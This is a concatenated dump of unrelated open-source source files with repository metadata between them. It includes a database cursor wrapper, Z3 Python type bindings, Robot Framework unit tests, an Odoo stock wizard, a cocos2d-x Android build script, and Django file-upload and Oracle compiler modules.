		return record

	def fetchone(self):
		return self.cr.fetchone()

	def dictfetchone(self):
		"""Fetch one row as a dict; {} when the result set is empty."""
		if self.cr.rowcount > 0:
			return self._row_to_dict(self.cr.fetchone())
		return {}

	def fetchmany(self, size = None):
		if not size:
			size = self.cr.arraysize
		return self.cr.fetchmany(size = size)

	def dictfetchmany(self, size = None):
		"""Fetch up to *size* rows as a list of dicts."""
		if not size:
			size = self.cr.arraysize
		records = []
		if self.cr.rowcount > 0:
			for row in self.cr.fetchmany(size = size):
				records.append(self._row_to_dict(row))
		return records

	def fetchall(self):
		return self.cr.fetchall()

	def dictfetchall(self):
		"""Fetch all remaining rows as a list of dicts."""
		records = []
		if self.cr.rowcount > 0:
			# BUG FIX: previously called fetchmany(size=size) with an
			# undefined 'size' variable (NameError); fetch everything.
			for row in self.cr.fetchall():
				records.append(self._row_to_dict(row))
		return records

	def _login(self, dsn, database, user, password, host, port):
		"""Connect and open a cursor; returns [ok, translated message].

		NOTE(review): the failure string "You a not logged..." is kept
		byte-identical because gettext catalogs key off the exact msgid.
		"""
		if self._checkLogin() or (self._connect(dsn = dsn, database = database, user = user, password = password, host = host, port = port) and self._cursor()):
			return [True, _("You logged as %s") % (user,)]
		else:
			return [False, _("You a not logged. Invalid username or password")]

	def _logout(self):
		"""Close the cursor and connection; returns [ok, message]."""
		if self.cr and not self.cr.closed:
			self.cr.close()
			self.cr = None
		if self.conn and not self.conn.closed:
			self.conn.close()
			self.conn = None
			return [True, _("User %s is logout") % (self.user,)]
		else:
			return [False, _("You a not logged")]
| agpl-3.0 |
rychipman/858-labs | symex/z3py/z3types.py | 2 | 3379 | import ctypes, z3core
class Z3Exception(Exception):
    """Exception raised by the Z3 bindings; carries an arbitrary payload
    accessible to callers as ``.value``."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        # Render the payload's repr, matching how Z3 reports errors.
        return "%r" % (self.value,)
# Opaque handle wrappers for the Z3 C API.  Each class below is a ctypes
# void-pointer subtype that stores the raw native handle in
# _as_parameter_, so instances can be passed directly to ctypes foreign
# functions; from_param() is the ctypes conversion hook and simply passes
# the object through.
# NOTE(review): from_param is written without 'self'/@staticmethod; ctypes
# invokes it through the type so the instance arrives as 'obj' -- confirm
# before "fixing" the signature.
class ContextObj(ctypes.c_void_p):
    def __init__(self, context): self._as_parameter_ = context
    def from_param(obj): return obj
class Config(ctypes.c_void_p):
    def __init__(self, config): self._as_parameter_ = config
    def from_param(obj): return obj
class Symbol(ctypes.c_void_p):
    def __init__(self, symbol): self._as_parameter_ = symbol
    def from_param(obj): return obj
class Sort(ctypes.c_void_p):
    def __init__(self, sort): self._as_parameter_ = sort
    def from_param(obj): return obj
class FuncDecl(ctypes.c_void_p):
    def __init__(self, decl): self._as_parameter_ = decl
    def from_param(obj): return obj
class Ast(ctypes.c_void_p):
    def __init__(self, ast): self._as_parameter_ = ast
    def from_param(obj): return obj
class Pattern(ctypes.c_void_p):
    def __init__(self, pattern): self._as_parameter_ = pattern
    def from_param(obj): return obj
class Model(ctypes.c_void_p):
    def __init__(self, model): self._as_parameter_ = model
    def from_param(obj): return obj
class Literals(ctypes.c_void_p):
    def __init__(self, literals): self._as_parameter_ = literals
    def from_param(obj): return obj
class Constructor(ctypes.c_void_p):
    def __init__(self, constructor): self._as_parameter_ = constructor
    def from_param(obj): return obj
class ConstructorList(ctypes.c_void_p):
    def __init__(self, constructor_list): self._as_parameter_ = constructor_list
    def from_param(obj): return obj
class GoalObj(ctypes.c_void_p):
    def __init__(self, goal): self._as_parameter_ = goal
    def from_param(obj): return obj
class TacticObj(ctypes.c_void_p):
    def __init__(self, tactic): self._as_parameter_ = tactic
    def from_param(obj): return obj
class ProbeObj(ctypes.c_void_p):
    def __init__(self, probe): self._as_parameter_ = probe
    def from_param(obj): return obj
class ApplyResultObj(ctypes.c_void_p):
    def __init__(self, obj): self._as_parameter_ = obj
    def from_param(obj): return obj
class StatsObj(ctypes.c_void_p):
    def __init__(self, statistics): self._as_parameter_ = statistics
    def from_param(obj): return obj
class SolverObj(ctypes.c_void_p):
    def __init__(self, solver): self._as_parameter_ = solver
    def from_param(obj): return obj
class FixedpointObj(ctypes.c_void_p):
    def __init__(self, fixedpoint): self._as_parameter_ = fixedpoint
    def from_param(obj): return obj
class ModelObj(ctypes.c_void_p):
    def __init__(self, model): self._as_parameter_ = model
    def from_param(obj): return obj
class AstVectorObj(ctypes.c_void_p):
    def __init__(self, vector): self._as_parameter_ = vector
    def from_param(obj): return obj
class AstMapObj(ctypes.c_void_p):
    def __init__(self, ast_map): self._as_parameter_ = ast_map
    def from_param(obj): return obj
class Params(ctypes.c_void_p):
    def __init__(self, params): self._as_parameter_ = params
    def from_param(obj): return obj
class ParamDescrs(ctypes.c_void_p):
    def __init__(self, paramdescrs): self._as_parameter_ = paramdescrs
    def from_param(obj): return obj
class FuncInterpObj(ctypes.c_void_p):
    def __init__(self, f): self._as_parameter_ = f
    def from_param(obj): return obj
class FuncEntryObj(ctypes.c_void_p):
    def __init__(self, e): self._as_parameter_ = e
    def from_param(obj): return obj
| mit |
alexandrul-ci/robotframework | utest/utils/test_unic.py | 3 | 7030 | import unittest
import re
from robot.utils import unic, prepr, DotDict, JYTHON, IRONPYTHON, PY2, PY3
from robot.utils.asserts import assert_equal, assert_true
if JYTHON:
    from java.lang import String, Object, RuntimeException
    import JavaObject
    import UnicodeJavaLibrary

    # These tests exercise unic() against real Java objects and therefore
    # exist only when running under Jython.
    class TestJavaUnic(unittest.TestCase):

        def test_with_java_object(self):
            data = u'This is unicode \xe4\xf6'
            assert_equal(unic(JavaObject(data)), data)

        def test_with_class_type(self):
            assert_true('java.lang.String' in unic(String('').getClass()))

        def test_with_array_containing_unicode_objects(self):
            assert_true('Circle is 360' in
                        unic(UnicodeJavaLibrary().javaObjectArray()))

        def test_with_iterator(self):
            # unic() must not consume the iterator: next() still works after.
            iterator = UnicodeJavaLibrary().javaIterator()
            assert_true('java.util' in unic(iterator))
            assert_true('Circle is 360' in iterator.next())

        def test_failure_in_toString(self):
            # A failing toString() should fall back to the UnRepr message.
            class ToStringFails(Object, UnRepr):
                def toString(self):
                    raise RuntimeException(self.error)
            failing = ToStringFails()
            assert_equal(unic(failing), failing.unrepr)
class TestUnic(unittest.TestCase):
    """Tests for ``robot.utils.unic`` with non-ASCII, byte and failing inputs."""

    if not (JYTHON or IRONPYTHON):

        def test_unicode_nfc_and_nfd_decomposition_equality(self):
            import unicodedata
            text = u'Hyv\xe4'
            assert_equal(unic(unicodedata.normalize('NFC', text)), text)
            # In Mac filesystem umlaut characters are presented in NFD-format.
            # This is to check that unic normalizes all strings to NFC
            assert_equal(unic(unicodedata.normalize('NFD', text)), text)

    def test_object_containing_unicode_repr(self):
        assert_equal(unic(UnicodeRepr()), u'Hyv\xe4')

    def test_list_with_objects_containing_unicode_repr(self):
        objects = [UnicodeRepr(), UnicodeRepr()]
        result = unic(objects)
        if JYTHON:
            # This is actually wrong behavior
            assert_equal(result, '[Hyv\\xe4, Hyv\\xe4]')
        elif IRONPYTHON or PY3:
            # And so is this.
            # NOTE: a redundant `elif PY3:` branch asserting the same value
            # was removed here -- it could never be reached because this
            # condition already covers PY3.
            assert_equal(result, '[Hyv\xe4, Hyv\xe4]')
        else:
            expected = UnRepr.format('list', 'UnicodeEncodeError: ')[:-1]
            assert_true(result.startswith(expected))

    def test_bytes_below_128(self):
        assert_equal(unic('\x00-\x01-\x02-\x7f'), u'\x00-\x01-\x02-\x7f')

    def test_bytes_above_128(self):
        # Non-ASCII bytes are escaped, not decoded.
        assert_equal(unic(b'hyv\xe4'), u'hyv\\xe4')
        assert_equal(unic(b'\x00-\x01-\x02-\xe4'), u'\x00-\x01-\x02-\\xe4')

    def test_bytes_with_newlines_tabs_etc(self):
        assert_equal(unic(b"\x00\xe4\n\t\r\\'"), u"\x00\\xe4\n\t\r\\'")

    def test_bytearray(self):
        assert_equal(unic(bytearray(b'hyv\xe4')), u'hyv\\xe4')
        assert_equal(unic(bytearray(b'\x00-\x01-\x02-\xe4')), u'\x00-\x01-\x02-\\xe4')
        assert_equal(unic(bytearray(b"\x00\xe4\n\t\r\\'")), u"\x00\\xe4\n\t\r\\'")

    def test_failure_in_unicode(self):
        failing = UnicodeFails()
        assert_equal(unic(failing), failing.unrepr)

    def test_failure_in_str(self):
        failing = StrFails()
        assert_equal(unic(failing), failing.unrepr)
class TestPrettyRepr(unittest.TestCase):
    """Tests for ``robot.utils.prepr``: repr() with normalized string prefixes."""

    def _verify(self, item, expected=None):
        # Default expectation is plain repr(); tests pass an explicit string
        # when prepr() is supposed to differ from repr().
        if not expected:
            expected = repr(item)
        assert_equal(prepr(item), expected)

    def test_ascii_unicode(self):
        self._verify(u'foo', "'foo'")
        self._verify(u"f'o'o", "\"f'o'o\"")

    def test_non_ascii_unicode(self):
        self._verify(u'hyv\xe4', "'hyv\\xe4'" if PY2 else "'hyv\xe4'")

    def test_ascii_bytes(self):
        self._verify(b'ascii', "b'ascii'")

    def test_non_ascii_bytes(self):
        self._verify(b'non-\xe4scii', "b'non-\\xe4scii'")

    def test_bytearray(self):
        self._verify(bytearray(b'foo'), "bytearray(b'foo')")

    def test_non_strings(self):
        for inp in [1, -2.0, True, None, -2.0, (), [], {},
                    StrFails(), UnicodeFails()]:
            self._verify(inp)

    def test_failing_repr(self):
        failing = ReprFails()
        self._verify(failing, failing.unrepr)

    def test_unicode_repr(self):
        invalid = UnicodeRepr()
        if JYTHON:
            expected = 'Hyv\\xe4'
        elif IRONPYTHON or PY3:
            expected = u'Hyv\xe4'
        else:
            expected = invalid.unrepr  # This is correct.
        self._verify(invalid, expected)

    def test_non_ascii_repr(self):
        non_ascii = NonAsciiRepr()
        if IRONPYTHON or PY3:
            expected = u'Hyv\xe4'
        else:
            expected = 'Hyv\\xe4'  # This is correct.
        self._verify(non_ascii, expected)

    def test_collections(self):
        self._verify([u'foo', b'bar', 3], "['foo', b'bar', 3]")
        self._verify([u'foo', b'b\xe4r', (u'x', b'y')], "['foo', b'b\\xe4r', ('x', b'y')]")
        self._verify({u'x': b'\xe4'}, "{'x': b'\\xe4'}")

    def test_dotdict(self):
        self._verify(DotDict({u'x': b'\xe4'}), "{'x': b'\\xe4'}")

    def test_recursive(self):
        # Self-referencing list must not recurse forever.
        x = [1, 2]
        x.append(x)
        match = re.match(r'\[1, 2. <Recursion on list with id=\d+>\]', prepr(x))
        assert_true(match is not None)

    def test_split_big_collections(self):
        # Long collections are split one item per line.
        self._verify(list(range(100)))
        self._verify([u'Hello, world!'] * 10,
                     '[%s]' % ', '.join(["'Hello, world!'"] * 10))
        self._verify(list(range(300)),
                     '[%s]' % ',\n '.join(str(i) for i in range(300)))
        self._verify([u'Hello, world!'] * 30,
                     '[%s]' % ',\n '.join(["'Hello, world!'"] * 30))
class UnRepr(object):
    """Base fixture for objects whose conversion to text fails.

    ``unrepr`` yields the placeholder string ``unic``/``prepr`` are expected
    to produce when conversion raises.
    """
    error = 'This, of course, should never happen...'

    @staticmethod
    def format(name, error):
        # Same placeholder that robot.utils builds for broken objects.
        return "<Unrepresentable object %s. Error: %s>" % (name, error)

    @property
    def unrepr(self):
        return self.format(self.__class__.__name__, self.error)


class UnicodeFails(UnRepr):
    """Both text conversions raise RuntimeError."""
    def __unicode__(self):
        raise RuntimeError(self.error)

    def __str__(self):
        raise RuntimeError(self.error)


class StrFails(UnRepr):
    """__unicode__ raises UnicodeError, __str__ raises RuntimeError."""
    def __unicode__(self):
        raise UnicodeError()

    def __str__(self):
        raise RuntimeError(self.error)


class ReprFails(UnRepr):
    """repr() itself raises RuntimeError."""
    def __repr__(self):
        raise RuntimeError(self.error)


class UnicodeRepr(UnRepr):
    """repr() returns a unicode string (fails to encode only on Python 2)."""
    def __init__(self):
        try:
            repr(self)
        except UnicodeEncodeError as err:
            self.error = 'UnicodeEncodeError: %s' % err

    def __repr__(self):
        return u'Hyv\xe4'


class NonAsciiRepr(UnRepr):
    """repr() returns a native string with a non-ASCII byte/character."""
    def __init__(self):
        try:
            repr(self)
        except UnicodeEncodeError as err:
            self.error = 'UnicodeEncodeError: %s' % err

    def __repr__(self):
        return 'Hyv\xe4'
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| apache-2.0 |
windedge/odoomrp-wip | stock_quant_manual_assign/wizard/assign_manual_quants.py | 9 | 3737 | # -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
from openerp import fields, models, api, exceptions, _
class AssignManualQuants(models.TransientModel):
    """Wizard to manually pick the stock quants reserved for a move.

    The stock.move being edited is taken from ``active_id`` in the context.
    """
    _name = 'assign.manual.quants'

    def lines_qty(self):
        # Sum of quantities on the lines the user has ticked.
        total_qty = 0
        for line in self.quants_lines:
            if line.selected:
                total_qty += line.qty
        return total_qty

    @api.one
    @api.constrains('quants_lines')
    def check_qty(self):
        # Reject selections exceeding the quantity required by the move.
        # NOTE(review): exceptions.Warning is called with two arguments
        # (title, message) here -- confirm this matches the Odoo version
        # targeted; some versions take a single message argument.
        if self.quants_lines:
            total_qty = self.lines_qty()
            move = self.env['stock.move'].browse(self.env.context['active_id'])
            if total_qty > move.product_uom_qty:
                raise exceptions.Warning(_('Error'),
                                         _('Quantity is higher'
                                           ' than the needed one'))

    @api.depends('quants_lines')
    def get_move_qty(self):
        # Quantity of the move still not covered by the selected lines.
        move = self.env['stock.move'].browse(self.env.context['active_id'])
        self.move_qty = move.product_uom_qty - self.lines_qty()

    name = fields.Char(string='Name')
    move_qty = fields.Float(string="Remaining qty", compute="get_move_qty")
    quants_lines = fields.One2many('assign.manual.quants.lines',
                                   'assign_wizard', string='Quants')

    @api.multi
    def assign_quants(self):
        """Replace the move's current reservations with the selected quants."""
        move = self.env['stock.move'].browse(self.env.context['active_id'])
        move.picking_id.mapped('pack_operation_ids').unlink()
        quants = []
        # [3, id] in a one2many write unlinks the relation without deleting
        # the quant itself.
        for quant_id in move.reserved_quant_ids.ids:
            move.write({'reserved_quant_ids': [[3, quant_id]]})
        for line in self.quants_lines:
            if line.selected:
                quants.append([line.quant, line.qty])
        # Old-API call through self.pool; quants_reserve expects
        # (quant, qty) pairs.
        self.pool['stock.quant'].quants_reserve(
            self.env.cr, self.env.uid, quants, move, context=self.env.context)
        return {}

    @api.model
    def default_get(self, var_fields):
        """Prefill the lines with available quants; already-reserved quants
        come preselected with their quantity."""
        move = self.env['stock.move'].browse(self.env.context['active_id'])
        # '|' only joins the two location_id leaves; the remaining leaves
        # are AND-ed as usual.
        available_quants_ids = self.env['stock.quant'].search(
            ['|', ('location_id', '=', move.location_id.id),
             ('location_id', 'in', move.location_id.child_ids.ids),
             ('product_id', '=', move.product_id.id),
             ('qty', '>', 0),
             ('reservation_id', '=', False)])
        available_quants = [{'quant': x.id} for x in available_quants_ids]
        available_quants.extend(
            {'quant': x.id,
             'selected': True,
             'qty': x.qty
             } for x in move.reserved_quant_ids)
        return {'quants_lines': available_quants}
class AssignManualQuantsLines(models.TransientModel):
    """One selectable quant row of the assign.manual.quants wizard."""
    _name = 'assign.manual.quants.lines'
    _rec_name = 'quant'

    @api.onchange('selected')
    def onchange_selected(self):
        # Deselecting clears the quantity; selecting fills it with as much
        # of the quant as the move still needs.
        if not self.selected:
            self.qty = False
        if self.selected and self.qty == 0:
            quant_qty = self.quant.qty
            remaining_qty = self.assign_wizard.move_qty
            if quant_qty < remaining_qty:
                self.qty = quant_qty
            else:
                self.qty = remaining_qty

    assign_wizard = fields.Many2one('assign.manual.quants', string='Move',
                                    required=True, ondelete="cascade")
    quant = fields.Many2one('stock.quant', string="Quant", required=True,
                            ondelete='cascade')
    qty = fields.Float(string='QTY')
    selected = fields.Boolean(string="Select")
| agpl-3.0 |
wanmaple/MWFrameworkForCocosJs | frameworks/runtime-src/proj.android/build_native.py | 43 | 5988 | #!/usr/bin/python
'''
build_native.py
This script will copy resources to assets and build native code with NDK.
'''
import os
import os.path
import re
import shutil
import sys

from optparse import OptionParser
def get_num_of_cpu():
    ''' The build process can be accelerated by running multiple concurrent
    job processes using the -j-option.

    Returns the number of CPUs, falling back to 1 if it cannot be determined.
    '''
    try:
        if sys.platform == 'win32':
            if 'NUMBER_OF_PROCESSORS' in os.environ:
                return int(os.environ['NUMBER_OF_PROCESSORS'])
            else:
                return 1
        else:
            # multiprocessing is in the standard library, unlike numpy's
            # cpuinfo helper that this function previously depended on.
            import multiprocessing
            return multiprocessing.cpu_count()
    except Exception:
        print("Can't know cpuinfo, use default 1 cpu")
        return 1
def check_environment_variables():
    ''' Checking the environment NDK_ROOT, which will be used for building.

    Returns the value of NDK_ROOT, or exits with status 1 if it is not set.
    '''
    try:
        NDK_ROOT = os.environ['NDK_ROOT']
    except KeyError:
        # Only a missing key is expected here; anything else should surface.
        print("NDK_ROOT not defined. Please define NDK_ROOT in your environment")
        sys.exit(1)

    return NDK_ROOT
def select_toolchain_version(ndk_root):
    '''Pick the GCC toolchain version for the given NDK installation.

    Parses RELEASE.TXT in *ndk_root* (e.g. "r10c (64-bit)") and returns
    "4.9" for NDK r10c or newer, otherwise "4.8" (also on any parse or
    read failure).

    Fixes: this function used ``re`` without importing it and the
    Python-2-only ``cmp()`` builtin; both are corrected here.
    '''
    ret_version = "4.8"

    version_file_path = os.path.join(ndk_root, "RELEASE.TXT")
    try:
        with open(version_file_path) as version_file:
            lines = version_file.readlines()

        version_num = None
        version_char = None
        pattern = r'^[a-zA-Z]+(\d+)(\w)'
        for line in lines:
            str_line = line.lstrip()
            match = re.match(pattern, str_line)
            if match:
                version_num = int(match.group(1))
                version_char = match.group(2)
                break

        if version_num is None:
            print("Parse NDK version from file %s failed." % version_file_path)
        else:
            version_char = version_char.lower()
            # cmp(version_char, 'c') >= 0 in the original; plain string
            # comparison is equivalent and works on Python 3.
            if version_num > 10 or (version_num == 10 and version_char >= 'c'):
                ret_version = "4.9"
    except Exception:
        print("Parse NDK version from file %s failed." % version_file_path)

    print("NDK_TOOLCHAIN_VERSION: %s" % ret_version)
    if ret_version == "4.8":
        print(
            "Your application may crash when using c++ 11 regular expression with NDK_TOOLCHAIN_VERSION %s" % ret_version)

    return ret_version
def do_build(cocos_root, ndk_root, app_android_root, ndk_build_param,sdk_root,build_mode):
    """Run ndk-build for the project, raising on a non-zero exit status.

    sdk_root is accepted but unused here (kept for the caller's signature).
    """
    ndk_path = os.path.join(ndk_root, "ndk-build")
    ndk_toolchain_version = select_toolchain_version(ndk_root)

    # windows should use ";" to seperate module paths
    platform = sys.platform
    if platform == 'win32':
        ndk_module_path = 'NDK_MODULE_PATH=%s/..;%s;%s/external;%s/cocos NDK_TOOLCHAIN_VERSION=%s' % (cocos_root, cocos_root, cocos_root, cocos_root, ndk_toolchain_version)
    else:
        ndk_module_path = 'NDK_MODULE_PATH=%s/..:%s:%s/external:%s/cocos NDK_TOOLCHAIN_VERSION=%s' % (cocos_root, cocos_root, cocos_root, cocos_root, ndk_toolchain_version)

    num_of_cpu = get_num_of_cpu()

    # NDK_DEBUG is 1 for debug builds (build_mode=='debug' evaluates to a
    # bool formatted as %d).
    if ndk_build_param == None:
        command = '%s -j%d -C %s NDK_DEBUG=%d %s' % (ndk_path, num_of_cpu, app_android_root, build_mode=='debug', ndk_module_path)
    else:
        command = '%s -j%d -C %s NDK_DEBUG=%d %s %s' % (ndk_path, num_of_cpu, app_android_root, build_mode=='debug', ndk_build_param, ndk_module_path)
    print command
    if os.system(command) != 0:
        raise Exception("Build dynamic library for project [ " + app_android_root + " ] fails!")
def copy_files(src, dst):
    """Recursively copy the contents of *src* into the existing directory
    *dst*, skipping hidden files and ".gz" files (Android cannot package
    files ending with ".gz"). Subdirectories are copied regardless of name.
    """
    for entry in os.listdir(src):
        full_path = os.path.join(src, entry)
        if os.path.isfile(full_path):
            if not entry.startswith('.') and not entry.endswith('.gz'):
                shutil.copy(full_path, dst)
        elif os.path.isdir(full_path):
            target = os.path.join(dst, entry)
            os.mkdir(target)
            copy_files(full_path, target)
def copy_resources(app_android_root):
    """Rebuild the Android assets directory from the game's res/src/script
    trees (paths are relative to the proj.android directory)."""
    # remove app_android_root/assets if it exists
    assets_dir = os.path.join(app_android_root, "assets")
    if os.path.isdir(assets_dir):
        shutil.rmtree(assets_dir)

    # copy resources
    os.mkdir(assets_dir)
    assets_res_dir = assets_dir + "/res";
    assets_scripts_dir = assets_dir + "/src";
    assets_jsb_dir = assets_dir + "/script";
    os.mkdir(assets_res_dir);
    os.mkdir(assets_scripts_dir);
    os.mkdir(assets_jsb_dir);

    # Project entry files go to the assets root.
    shutil.copy(os.path.join(app_android_root, "../../../main.js"), assets_dir)
    shutil.copy(os.path.join(app_android_root, "../../../project.json"), assets_dir)

    resources_dir = os.path.join(app_android_root, "../../../res")
    copy_files(resources_dir, assets_res_dir)

    resources_dir = os.path.join(app_android_root, "../../../src")
    copy_files(resources_dir, assets_scripts_dir)

    # JS bindings runtime scripts.
    resources_dir = os.path.join(app_android_root, "../../../frameworks/js-bindings/bindings/script")
    copy_files(resources_dir, assets_jsb_dir)
def build(targets,ndk_build_param,build_mode):
    """Top-level build: validate env, copy assets, then run ndk-build.

    targets is currently unused; build_mode falls back to 'debug' for any
    value other than 'release'.
    """
    ndk_root = check_environment_variables()
    sdk_root = None
    project_root = os.path.dirname(os.path.realpath(__file__))
    cocos_root = os.path.join(project_root, "..", "..", "..", "frameworks/js-bindings/cocos2d-x")
    print cocos_root
    if build_mode is None:
        build_mode = 'debug'
    elif build_mode != 'release':
        build_mode = 'debug'

    copy_resources(project_root)
    do_build(cocos_root, ndk_root, project_root,ndk_build_param,sdk_root,build_mode)
# -------------- main --------------
# Command-line entry point: parse -n/-b options and run the build,
# exiting 1 on any failure.
if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option("-n", "--ndk", dest="ndk_build_param",
                      help='Parameter for ndk-build')
    parser.add_option("-b", "--build", dest="build_mode",
                      help='The build mode for NDK project, debug or release')
    (opts, args) = parser.parse_args()

    try:
        build(args, opts.ndk_build_param,opts.build_mode)
    except Exception as e:
        print e
        sys.exit(1)
| apache-2.0 |
richardnpaul/FWL-Website | lib/python2.7/site-packages/django/core/files/uploadedfile.py | 223 | 4156 | """
Classes representing uploaded files.
"""
import os
from io import BytesIO
from django.conf import settings
from django.core.files.base import File
from django.core.files import temp as tempfile
from django.utils.encoding import force_str
__all__ = ('UploadedFile', 'TemporaryUploadedFile', 'InMemoryUploadedFile',
'SimpleUploadedFile')
class UploadedFile(File):
    """
    An abstract uploaded file (``TemporaryUploadedFile`` and
    ``InMemoryUploadedFile`` are the built-in concrete subclasses).

    An ``UploadedFile`` object behaves somewhat like a file object and
    represents some file data that the user submitted with a form.
    """
    DEFAULT_CHUNK_SIZE = 64 * 2**10

    def __init__(self, file=None, name=None, content_type=None, size=None, charset=None):
        super(UploadedFile, self).__init__(file, name)
        self.size = size
        self.content_type = content_type
        self.charset = charset

    def __repr__(self):
        return force_str("<%s: %s (%s)>" % (
            self.__class__.__name__, self.name, self.content_type))

    def _get_name(self):
        return self._name

    def _set_name(self, name):
        # Sanitize the file name so that it can't be dangerous.
        if name is not None:
            # Just use the basename of the file -- anything else is dangerous.
            name = os.path.basename(name)

            # File names longer than 255 characters can cause problems on older OSes.
            if len(name) > 255:
                name, ext = os.path.splitext(name)
                name = name[:255 - len(ext)] + ext

        self._name = name

    # Old-style property pair kept (rather than @property) so subclasses can
    # still override _get_name/_set_name individually.
    name = property(_get_name, _set_name)
class TemporaryUploadedFile(UploadedFile):
    """
    A file uploaded to a temporary location (i.e. stream-to-disk).
    """
    def __init__(self, name, content_type, size, charset):
        # Honor FILE_UPLOAD_TEMP_DIR when configured; the OS default
        # temporary directory is used otherwise.
        if settings.FILE_UPLOAD_TEMP_DIR:
            file = tempfile.NamedTemporaryFile(suffix='.upload',
                                               dir=settings.FILE_UPLOAD_TEMP_DIR)
        else:
            file = tempfile.NamedTemporaryFile(suffix='.upload')
        super(TemporaryUploadedFile, self).__init__(file, name, content_type, size, charset)

    def temporary_file_path(self):
        """
        Returns the full path of this file.
        """
        return self.file.name

    def close(self):
        try:
            return self.file.close()
        except OSError as e:
            # errno 2 is ENOENT ("no such file or directory").
            if e.errno != 2:
                # Means the file was moved or deleted before the tempfile
                # could unlink it. Still sets self.file.close_called and
                # calls self.file.file.close() before the exception
                raise
class InMemoryUploadedFile(UploadedFile):
    """
    A file uploaded into memory (i.e. stream-to-memory).
    """
    def __init__(self, file, field_name, name, content_type, size, charset):
        super(InMemoryUploadedFile, self).__init__(file, name, content_type, size, charset)
        # Name of the form field this file was submitted under.
        self.field_name = field_name

    def open(self, mode=None):
        # mode is ignored: the in-memory stream is simply rewound.
        self.file.seek(0)

    def close(self):
        pass

    def chunks(self, chunk_size=None):
        # chunk_size is ignored: the whole content is yielded at once since
        # it is already in memory.
        self.file.seek(0)
        yield self.read()

    def multiple_chunks(self, chunk_size=None):
        # Since it's in memory, we'll never have multiple chunks.
        return False
class SimpleUploadedFile(InMemoryUploadedFile):
    """
    A simple representation of a file, which just has content, size, and a name.
    """
    def __init__(self, name, content, content_type='text/plain'):
        data = content or b''
        super(SimpleUploadedFile, self).__init__(
            BytesIO(data), None, name, content_type, len(data), None)

    @classmethod
    def from_dict(cls, file_dict):
        """
        Creates a SimpleUploadedFile object from
        a dictionary object with the following keys:
           - filename
           - content-type
           - content
        """
        return cls(file_dict['filename'],
                   file_dict['content'],
                   file_dict.get('content-type', 'text/plain'))
| gpl-3.0 |
jarshwah/django | django/db/backends/oracle/compiler.py | 59 | 2044 | from django.db.models.sql import compiler
class SQLCompiler(compiler.SQLCompiler):
    def as_sql(self, with_limits=True, with_col_aliases=False, subquery=False):
        """
        Creates the SQL for this query. Returns the SQL string and list
        of parameters.  This is overridden from the original Query class
        to handle the additional SQL Oracle requires to emulate LIMIT
        and OFFSET.

        If 'with_limits' is False, any limit/offset information is not
        included in the query.
        """
        # The `do_offset` flag indicates whether we need to construct
        # the SQL needed to use limit/offset with Oracle.
        do_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
        if not do_offset:
            sql, params = super(SQLCompiler, self).as_sql(
                with_limits=False,
                with_col_aliases=with_col_aliases,
                subquery=subquery,
            )
        else:
            # Column aliases are forced so the outer SELECT * can refer to
            # the inner query's columns unambiguously.
            sql, params = super(SQLCompiler, self).as_sql(
                with_limits=False,
                with_col_aliases=True,
                subquery=subquery,
            )
            # Wrap the base query in an outer SELECT * with boundaries on
            # the "_RN" column.  This is the canonical way to emulate LIMIT
            # and OFFSET on Oracle.
            high_where = ''
            if self.query.high_mark is not None:
                high_where = 'WHERE ROWNUM <= %d' % (self.query.high_mark,)
            sql = (
                'SELECT * FROM (SELECT "_SUB".*, ROWNUM AS "_RN" FROM (%s) '
                '"_SUB" %s) WHERE "_RN" > %d' % (sql, high_where, self.query.low_mark)
            )

        return sql, params
# The remaining compilers only need the Oracle-aware SQLCompiler mixed in;
# they inherit all behavior from the generic implementations.
class SQLInsertCompiler(compiler.SQLInsertCompiler, SQLCompiler):
    pass


class SQLDeleteCompiler(compiler.SQLDeleteCompiler, SQLCompiler):
    pass


class SQLUpdateCompiler(compiler.SQLUpdateCompiler, SQLCompiler):
    pass


class SQLAggregateCompiler(compiler.SQLAggregateCompiler, SQLCompiler):
    pass
| bsd-3-clause |
edx/course-discovery | course_discovery/apps/api/v1/tests/test_views/test_program_types.py | 1 | 1862 | from django.urls import reverse
from course_discovery.apps.api.v1.tests.test_views.mixins import APITestCase, SerializationMixin
from course_discovery.apps.core.tests.factories import USER_PASSWORD, UserFactory
from course_discovery.apps.course_metadata.models import ProgramType
from course_discovery.apps.course_metadata.tests.factories import ProgramTypeFactory
class ProgramTypeViewSetTests(SerializationMixin, APITestCase):
    """API tests for the read-only program_type endpoints."""
    list_path = reverse('api:v1:program_type-list')

    def setUp(self):
        super().setUp()
        # Authenticated staff/superuser so list/detail views are permitted.
        self.user = UserFactory(is_staff=True, is_superuser=True)
        self.client.login(username=self.user.username, password=USER_PASSWORD)

    def test_authentication(self):
        """ Verify the endpoint requires the user to be authenticated. """
        response = self.client.get(self.list_path)
        assert response.status_code == 200

        self.client.logout()
        response = self.client.get(self.list_path)
        assert response.status_code == 401

    def test_list(self):
        """ Verify the endpoint returns a list of all program types. """
        ProgramTypeFactory.create_batch(4)
        expected = ProgramType.objects.all()

        # NOTE(review): the hard-coded query counts (6 and 5 below) guard
        # against N+1 regressions but are brittle across schema changes.
        with self.assertNumQueries(6):
            response = self.client.get(self.list_path)
        assert response.status_code == 200
        assert response.data['results'] == self.serialize_program_type(expected, many=True)

    def test_retrieve(self):
        """ The request should return details for a single program type. """
        program_type = ProgramTypeFactory()
        url = reverse('api:v1:program_type-detail', kwargs={'slug': program_type.slug})

        with self.assertNumQueries(5):
            response = self.client.get(url)
        assert response.status_code == 200
        assert response.data == self.serialize_program_type(program_type)
| agpl-3.0 |
vincent-noel/libSigNetSim | libsignetsim/numl/tests/test_example_notes.py | 1 | 1937 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel (vincent.noel@butantan.gov.br)
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file is a simple example of reading and writing a basic NuML doc
"""
